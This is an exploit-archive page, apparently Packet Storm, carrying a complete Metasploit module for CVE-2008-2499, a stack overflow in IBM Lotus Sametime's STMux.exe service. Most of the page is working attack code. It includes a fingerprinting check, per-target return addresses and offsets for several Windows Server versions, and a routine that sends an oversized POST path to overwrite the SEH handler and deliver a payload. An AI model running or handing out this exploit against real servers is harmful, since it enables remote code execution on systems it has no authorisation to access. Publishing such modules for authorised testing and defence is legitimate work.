what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

IBM Lotus Domino Sametime STMux.exe Stack Overflow

IBM Lotus Domino Sametime STMux.exe Stack Overflow
Posted Nov 26, 2009
Authored by patrick, riaf | Site metasploit.com

This Metasploit module exploits a stack overflow in Lotus Domino's Sametime Server. By sending an overly long POST request to the Multiplexer STMux.exe service we are able to overwrite SEH. Based on the exploit by Manuel Santamarina Suarez.

tags | exploit, overflow
advisories | CVE-2008-2499
SHA-256 | dbb922034950b5d503d3b1d3a1d7c5b5c97e423e24541e11f69c20a9ef2b6eba

IBM Lotus Domino Sametime STMux.exe Stack Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Domino Sametime STMux.exe Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in Lotus Domino's Sametime
Server. By sending an overly long POST request to the Multiplexer
STMux.exe service we are able to overwrite SEH. Based on the exploit
by Manuel Santamarina Suarez.
},
'Author' => [ 'patrick', 'riaf <riaf@mysec.org>' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-2499' ],
[ 'OSVDB', '45610' ],
[ 'BID', '29328' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK against Windows 2003 SP1 20081114
[ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll
[ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll
[ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
[ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],
[ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
],
'DisclosureDate' => 'May 21 2008',
'DefaultTarget' => 1))

register_options(
[
Opt::RPORT(1533),
], self.class)
end

def check
connect

req = "HEAD / HTTP/1.0\r\n\r\n"
req << "User-Agent: Sametime Community Agent\r\n"
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
sock.put(req)
res = sock.get_once(-1,3)

disconnect

if (res =~/Lotus-Domino/)
connect

req = "GET /CommunityCBR HTTP/1.0\r\n\r\n"
req << "User-Agent: Sametime Community Agent\r\n"
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
sock.put(req)
res = sock.get_once(-1,3)

disconnect

if (res =~/200 OK/)
return Exploit::CheckCode::Detected
end
end

return Exploit::CheckCode::Safe
end

def exploit
connect

pad1 = rand_text_alpha_lower(44)
pad2 = rand_text_alpha_lower(29)

# Patrick - We should use Metasm here.
popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]
popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]
esp = "\xff\x24\x24" # dword ptr ss:[esp]
jmp = "\x74\x23" + "\x75\x21" # je short, jnz short
seh = [target['Ret']].pack('V')

path = pad1 + jmp + seh + pad2 + popebx + popad + esp

req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
req << "User-Agent: Sametime Community Agent\r\n"
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
req << "Content-Length: #{payload.encoded.length}\r\n"
req << "Connection: Close\r\n"
req << "Cache-Control: no-cache\r\n\r\n"
req << payload.encoded

sock.put(req)

handler
disconnect
end
end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close